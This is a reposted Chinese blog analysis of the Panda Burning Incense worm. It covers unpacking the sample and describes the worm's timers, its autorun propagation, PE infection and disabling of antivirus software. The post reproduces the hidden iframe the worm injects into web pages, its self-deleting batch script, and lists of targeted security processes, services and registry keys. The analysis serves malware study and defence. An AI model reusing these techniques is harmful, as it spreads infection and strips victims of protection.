OD分析-熊猫烧香

最新推荐文章于 2024-03-11 02:40:53 发布
最新推荐文章于 2024-03-11 02:40:53 发布
阅读量228 收藏 1
点赞数
文章标签: 操作系统 php
原文链接:http://www.cnblogs.com/ltyandy/p/11332090.html
版权

转载自看雪论坛-暗夜之刃大神

https://bbs.pediy.com/thread-224773.htm

目录

0x01 分析注意事项-分析工具

0x02 病毒信息

0x03 病毒行为

0x04 脱壳

0x05 病毒初始化分析

0x06 Proc_时钟1 (时钟周期: 6000ms)

0x07 Proc_时钟2 (时钟周期: 1000ms)

0x08 Proc_时钟3 (时钟周期: 120000ms)

0x09 Proc_时钟4 (时钟周期: 10000ms)

0x10 Proc_时钟5 (时钟周期: 6000ms)

0x11 Proc_时钟6 (时钟周期: 10000ms)

0x12 Proc_时钟7 (时钟周期: 180000ms)

0x13 感染线程分析

0x14 具体感染流程分析

0x15 感染后程序的运行

0x01 分析注意事项-分析工具

(1) 这个病毒在xp系统分析比较好, Win7_64位下 “C:\WINDOWS\system32\drivers\” 目录不能运行程序.

<我在这里耽误了很长的时间, 病毒分析要尽量确定病毒运行的环境, 很多病毒是在特定的环境中运行>

(2) 两个很重要的API, 时钟回调 && 线程回调 都需要分析.

SetTimer: 病毒经常用时钟来定时结束指定进程.

CreateThread: 执行其他的代码分支, 感染PE文件的代码就是用线程执行的.

(3) IDA 的签名功能,能够识别很多的函数来进行辅助分析.

分析工具

火绒剑: 敏感行为检测很不错, OD动态调试时用来辅助分析函数功能很好用.

OD, IDA, 010Editor:

BCompare: 十六进制对比感染前与感染后的程序

PE类工具: 查壳 && 编程语言识别.

0x02 病毒信息

(1) 文件大小: 30,001字节

(2) MD5; 512301C535C88255C9A252FDF70B7A03

(3) 壳: FSG v2.0

(4) 编写语言: Delphi

0x03 病毒行为

(1) 写启动项

(2) 关闭服务

(3) 感染PE文件

(4) 访问指定网址, 判断是否需要更新

(5) 释放文件, 并设置文件属性为<隐藏|系统>

(6) 提升进程权限

(7) 遍历窗口名, 向指定窗口名发送QUIT消息, 并结束指定进程

0x04 脱壳

(1) 查壳

1565424979468

(1) 执行到OEP 处, 然后 dump文件.

559788_65TCQW4B4KC58F5.jpg

(2) 修复IAT 表的结尾, 然后在使用 ImpREC 工具修复输入表即可脱壳成功.

1565425003181

0x05 病毒初始化分析

(1) 判断字符串是否被修改

559788_DK8CZTE8RANKCP9.jpg

(2) 最重要的3个函数

1565425019778

(3) 判断Desktop_.ini 是否存在

559788_ZR3PFUTT3NPD4B2.jpg

(4) 将自身读入到内存中

559788_UY9ECEMBCNYKXY6.jpg

(5) 将 "C:\WINDOWS\system32\drivers\spo0lsv.exe" 转为大写后, 和自身路径对比

559788_WZSCH57YQP9C4UZ.jpg

(6) 如果不在 "C:\WINDOWS\system32\drivers\spo0lsv.exe" 处运行, 则将自身复制到 "C:\WINDOWS\system32\drivers\spo0lsv.exe"

559788_MNGUVBCB2KED343.jpg

运行 "C:\WINDOWS\system32\drivers\spo0lsv.exe", 并结束自身

559788_TDNBFB53RW6KMSG.jpg

0x06 Proc_时钟1 (时钟周期: 6000ms)

(1) 判断是否需要释放文件

559788_SZEW83WAFJK9JAD.jpg

(2) 遍历磁盘, 将自身复制到 盘符:\setup.exe

559788_SFT25C35FQ7XMFQ.jpg

(3) 遍历磁盘, 创建 盘符:\autorun.inf 文件

559788_7BAEHGCHK2Z9SS9.jpg

(4)设置setup.exe 文件属性为, <系统,隐藏>

559788_MSRY7SC4TK3QTSA.jpg

(5)设置autorun.inf 文件属性为, <系统,隐藏>

559788_NK7ZR4Z8UKT7RVN.jpg

559788_JCBE5SWT5U6GXY9.jpg

559788_9TAFXH9XKY4B8CT.jpg

(6) 写配置项

559788_J63NGK6AS8FJFU3.jpg

0x07 Proc_时钟2 (时钟周期: 1000ms)

(1) 提升进程权限

559788_9C75Z6ZREC6ANVM.jpg

(2) 遍历窗口名, 向指定窗口名发送QUIT消息, 并结束指定进程

559788_ZHMG3CX9AGAS4BX.jpg

1565425727596

559788_NTJ97F43CDSK7D8.jpg

查找的窗口列表:

防火墙,进程,VirusScan,NOD32,网镖,杀毒,毒霸,瑞星,江民,超级兔子,优化大师,木马清道夫,木馬清道夫,卡巴斯基反病毒

Symantec AntiVirus,Duba,esteem procs,绿鹰PC,密码防盗,噬菌体,木马辅助查找器,System Safety Monitor,Wrapped giftKiller

Winsock Expert,游戏木马检测大师,超级巡警,msctls_statusbar32,pjf(ustc),IceSword,

结束的进程列表:

Mcshield.exe,VsTskMgr.exe,naPrdMgr.exe,UpdaterUI.ex,TBMon.exe,scan32.exe,Ravmond.exe,CCenterexe,RavTask.exe,Rav.exe,

Ravmon.exe,RavmonD.exe,RavStub.exe,KVXP.kxp,KvMonXP.kxp,KVCenter.kxp,KVSrvXP.exe,KRegEx.exe,UIHost.exe,TrojDiekxp,

FrogAgent.exe,Logo1_.exe,Logo_1.exe,Rundl132.exe,regedit.exe,msconfig.exe,taskmgr.exe

(3) 写启动项

559788_SW2Z9775Y4VKWUU.jpg

(4) 设置隐藏的文件和文件夹,不可见

559788_K5Z8CZVYUXUJNPN.jpg

0x08 Proc_时钟3 (时钟周期: 120000ms)

(1) 通过 “http://www.ac86.cn/66/up.txt” 这个地址来更新, 网址已经失效了

1565425766677

0x09 Proc_时钟4 (时钟周期: 10000ms)

(1) 遍历磁盘, 关闭共享

559788_ZP4P8XTNCQMTMY3.jpg

(2) 关闭admin的共享

559788_9MZDPY9TGER43Q2.jpg

(3) 杀死当前时钟

559788_864AR5T54XM3C87.jpg

0x10 Proc_时钟5 (时钟周期: 6000ms)

(1) 将杀毒软件的注册表启动项设置为失效, 设置值为2, 被针对的杀毒软件注册表启动项列表如下:

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkAssociates Error Reporting Service"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse"

559788_DW742ZSHMXER56G.jpg

(2) 使用两种方式停止服务程序, 被停止的列表如下:

"sharedaccess","RsCCenter","RsRavMon","KVWSC" ,"KVSrvXP","kavsvc","AVP"

"McAfeeFramework","McShield","McTaskManager","navapsvc","wscsvc","KPfwSvc"

"KPfwSvc","ccProxy","ccProxy","ccProxy","SPBBCSvc","Symantec Core LC"

"NPFMntor","NPFMntor","FireSvc"

559788_SDW4JVNGCB4PYRF.jpg

0x11 Proc_时钟6 (时钟周期: 10000ms)

() 会获取这些网站的网页源码:

"http://www.tom.com"

"http://www.163.com"

"http://www.sohu.com"

"http://www.yahoo.com"

"http://www.google.com"

559788_CVSQQN6UPWN3DCW.jpg

0x12 Proc_时钟7 (时钟周期: 180000ms)

(1) 通过 “http://update.whboy.net/worm.txt” 这个地址来更新, 网址已经失效了

559788_8BFCAPHZMNANJ2J.jpg

0x13 感染线程分析

(1) 感染线程回调函数

559788_ZHF99UD98KT6EUU.jpg

(2) 获取所有磁盘名

559788_FHT945D3BQCYFGT.jpg

(3) 遍历磁盘_感染目标

559788_BQ2Q6TGECQ46GHV.jpg

(4) 感染的文件类型为: "EXE", "SRC", "PIF", "COM"

559788_RTSSWQMXFMBCK9R.jpg

559788_F9X7CEM5XCT7U3G.jpg

(5) 在网页文件 "html", "asp", "php", "jsp", "aspx" 的尾部加上 <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>.

559788_9UEVESB9DBDY7U5.jpg

559788_47GAPTG2XTW6WZR.jpg

0x14 具体感染流程分析

(1) 读入目标文件

559788_YNVU4HDMU8C57K5.jpg

(2) 从将要感染程序中查找 "WhBoy", 找到则说明已经被感染了

559788_MP57S9MGFXYXPVZ.jpg

(3) 设置目标文件属性为 “NORMAL”

559788_B4RCRYYPZ79DDKK.jpg

(4) 将自身复制为目标文件

559788_FR8AZA5YE43GC9S.jpg

(5) 将目标程序追加到病毒后面

559788_X7UCKPAPWRY5GNX.jpg

(6) 感染后的标志为 “WhBoy” + 被感染程序名 + “.exe”

559788_MWG6G4ATCT5SMX9.jpg

0x15 感染后程序的运行

(1) <感染后程序> 的结构,

559788_GGRGCQUUUU5QZNF.jpg

559788_4K2HYFNT2TVFMHH.jpg

(2) 判断是否被感染, 感染则跳转

559788_623BN3E5KC5KRXQ.jpg

(3) 创建 自身进程名 + “.exe”文件

559788_6ZJ3XGCTC8CY8V3.jpg

559788_WWFXFVVDNRBGM7E.jpg

(4) 从自身中提取 <源程序> 并写到 “BeInfected.exe.exe”

559788_28KRTKKGV5372GW.jpg

559788_BQ3DMWPJTVP8YP8.jpg

(5) 在 Temp目录 写批处理 并 运行批处理

559788_YC2KFRM649787AE.jpg

批处理内容:

//循环删除自身, 直至删除成功
:try1

del "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"

if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe" goto try1

//将 BeInfected.exe.exe 修改为 BeInfected.exe, 并运行 BeInfected.exe.

ren "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" "BeInfected.exe"

if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" goto try2

"C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"

:try2

del %0

执行生成的批处理

559788_D2ABGYXK49AF6XK.jpg

(6) <感染后程序> 就被还原成 <源程序> 了, 并运行 <源程序>.

559788_UXRM5T2BRA5F7E9.jpg

(1) 有什么错误请大神们指出.

(2) 并感谢15PB老师们的帮助和教导.

转载于:https://www.cnblogs.com/ltyandy/p/11332090.html

weixin_30954607
关注
[系统安全] 十四.熊猫烧香病毒IDA和OD逆向分析--病毒释放过程(下)
杨秀璋的专栏
01-08 5191
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢!
[系统安全] 十二.熊猫烧香病毒IDA和OD逆向分析(上)病毒初始化
杨秀璋的专栏
01-06 5973
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢! IDA和OD作为逆向分析的“倚天剑和“屠龙刀”,学好它们的基本用法至关重要。本文重点分析熊猫烧香病毒的功
ArcGIS学习(十四)OD分析
最新发布
May the Force be with you
03-11 1662
本任务给大家带来的内容是网络节点关系分析。网络节点关系分析一般也叫OD分析。“O”指的是起点(ORIGIN),"D”指的是终点(DESTINATION),0D分析即为基于起点到终点的分析。网络节点关系分析我们经常遇到,如不同城市之间的空间关系分析,不同城市群之间的空间关系分析,城市内通勤分析等。下面给大家看两个实际项目中的OD分析成果图:我们先进行第一个案例一一上海市KFC与麦当劳的空间聚集度分析。首先,我们来看看这个案例的场景和数据。
病毒木马查杀实战第007篇:熊猫烧香之逆向分析(下)
Gleam的专栏
11-20 4639
一、前言         这次我们会接着上一篇的内容继续对病毒进行分析分析中会遇到一些不一样的情况,毕竟之前的代码我们只要按照流程顺序一步一步往下走,就能够弄清楚病毒的行为,但是在接下来的代码中,如果依旧如此,在某些分支中的重要代码就执行不到了,所以我们需要采取一些策略,走完每个分支,彻底分析出病毒的行为。   二、病毒分析         现在程序执行到了loc_408171位置处:
病毒木马查杀实战第006篇:熊猫烧香之逆向分析(中)
Gleam的专栏
11-18 3944
一、前言         上一篇文章讲解了“熊猫烧香”病毒样本的反汇编代码入口处的分析,虽然尚未研究到病毒的核心部分,但其实我们后续的分析与之前的思想是一致的。而越到核心部分,可能会遇到越来越多的API函数,结合所调用函数的参数进行分析,反而有助于我们更容易地理解病毒的行为。应当将分析出的每一个CALL函数,改为我们能够理解的名字,这往往也有助于对后续程序的理解。   二、病毒功能分析
arcgis中制作出行od图_ArcGIS中的OD分析简介
weixin_36340926的博客
01-08 9389
ArcGIS中的OD分析主要用于模拟真实情况,进行快捷高效、个性化的出行分析。主要有两种实现方式,本文仅有文字教程,操作视频也许会有的(有了我可怎么通知有需要的人呢关注我B站?,啊哈哈哈)。-1st-XY转线:直线段OD简单地将OD两点连接起来,属性表中可以添加字段计算距离。适用于没有路网数据时,进行简单快速的分析。操作:1) 转换工具– Excel – Excel转表2) 数据...
大数据案例之OD线分析
SuperMap技术控
09-05 1万+
​ 我们从网络上爬取了2013年到2017年芝加哥每一辆出租车的每一单行程数据,数据内容示例如图一,包含了出租车ID,行程ID,上下车时间,上下车坐标,行程耗时,费用以及支付方式等信息。有了这些数据,我们就可以对其进行数据挖掘分析,找到打车需求最旺的区域和时间段,以便得到更好的出租车资源调度策略等。本案例中我们明确分析目标,要找出2016年里周末10点到18点这个时间段,从奥黑尔国际机场出...
号称病毒之王的“熊猫烧香”详细分析
Test网络安全
09-12 1万+
01-样本概况 1.1-样本信息 基本信息 文件: C:\Users\15pb-win7\Desktop\xiongmao.exe 大小: 30001 bytes 修改时间: 2018年7月14日, 8:40:21 MD5: 512301C535C88255C9A252FDF70B7A03 SHA1: CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870 CRC32: E334747C 病毒行为: 1.在系统目录下生成病毒程序
[系统安全] 十三.熊猫烧香病毒IDA和OD逆向分析(中)病毒释放机理
杨秀璋的专栏
01-07 5353
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢! IDA和OD作为逆向分析的“倚天剑和“屠龙刀”,学好它们的基本用法至关重要。本文重点分析熊猫烧香病毒的功
熊猫烧香病毒分析
黑夜黎明
05-17 1164
1.样本概况 1.1 样本信息 病毒名称:panda 所属家族:Virus MD5值:512301C535C88255C9A252FDF70B7A03 SHA1值:CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870 CRC32:E334747C 病毒行为:   复制自身、感染PE文件、覆写PE文件、修改注册表自启动、枚举进程、结束杀软进程、删除安全软件相关启动项   ...
OD拟合分析数据可视化优化方法研究
05-30
OD拟合分析数据可视化优化方法研究,研究od的人都懂得。
OD矩阵】笔记 || OD 数据可视分析综述·涂乐1), 陈彬捷1), 周志光1,2)*
chentao326的博客
01-16 9915
[1] 刘滨, 刘增杰, 刘宇, 等. 数据可视化研究综述[J]. Journal of Hebei University of Science & Technology, 2021, 42(6). Origin Destination Data 何为OD数据 OD数据是一类系数的轨迹描述数据,主要包括空间潜移的起点和终点 仅能部分表达对象的移动轨迹,如出租车上下客的位置、手机基站记录的移动位置变化 特点: (1) 以 OD 点对(起点、终点以及对应时间等属 性)的形式存储, 与空间地图结合紧密.
od分析基础逆向6
weixin_44585983的博客
07-22 3230
打开程序 随意输入用户名密码 出现错误字符 目标:得到该程序的相关序列号和了解序列号计算过程 载入odod中右键查找相关字符 容易发现输入正确后的字符串 可双击字符进入字符所在的messageBox输出函数 同时向上翻找计算流程 出现一段循环推测可能为计算序列号 再向上翻找 出现两段GetDlgItemTextA函数,为对应两个输入框 寻找关键函数也可以通过对GetDlgItemTextA...
ArcGIS学习14:基于OD方法的网络节点关系分析
apple_52179359的博客
02-12 3346
本文介绍关于网络节点关系分析的两个案例。
实验吧 该题不简单 OD详解 (flag 和分析内部算法)
qq_41071646的博客
08-17 1507
这个题是偶然在实验吧想起来做的题  本来打算的是分析一晚上的 但是发现经过这一段时间的学习 自己进步很大 然后在半小时的时候就做出来了这一道题 然后 分享给大家  实验吧原题网址   这道题其实想做出来不难 但是分析算法还是需要一些基础的   点开就是这个样子 随便输入一下 就是这个样子 知道了程序大概是什么样子 然后开始分析算法 (题目要求的flag 是 用户名为 hello 的注...
使用OD分析栈溢出
qq_33526144的博客
04-24 884
本文会演示两个发生栈溢出的例子,并用OD工具演示整个过程。 案例一 案例代码 // dishui_nx.cpp : Defines the entry point for the console application. // #include "stdafx.h" void HelloWord() { printf("Hello World"); getchar...
[安全攻防进阶篇] 九.熊猫烧香病毒机理IDA和OD逆向分析(上)
杨秀璋的专栏
12-08 1万+
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢!IDA和OD作为逆向分析的“倚天剑和“屠龙刀”,学好它们的基本用法至关重要。
[安全攻防进阶篇] 十.熊猫烧香病毒机理IDA和OD逆向分析--病毒释放过程(中)
热门推荐
杨秀璋的专栏
12-19 1万+
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢!
病毒木马查杀实战第005篇:熊猫烧香之逆向分析(上)
Gleam的专栏
11-17 8754
一、前言         对病毒进行逆向分析,可以彻底弄清楚病毒的行为,从而采取更有效的针对手段。为了节省篇幅,在这里我不打算将“熊猫烧香”进行彻底的分析,只会讲解一些比较重要的部分,大家只要掌握了这些思想,那么就可以处理很多的恶意程序了。一般来说,对病毒的静态分析,我们采用的工具是IDA Pro,动态分析则采用OllyDbg。由于后者会使病毒实际运行起来,所以为了安全起见,最好在虚拟机中操作。
华为od机试 - 英文输入法
05-10
华为OD机试-英文输入法是针对华为OD(Open Developer Platform)平台进行的一场技术考试,主要涉及英文输入法相关的知识和技术。英文输入法是计算机中常用的一种输入方式,对于计算机用户来说,掌握一种快速、准确地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值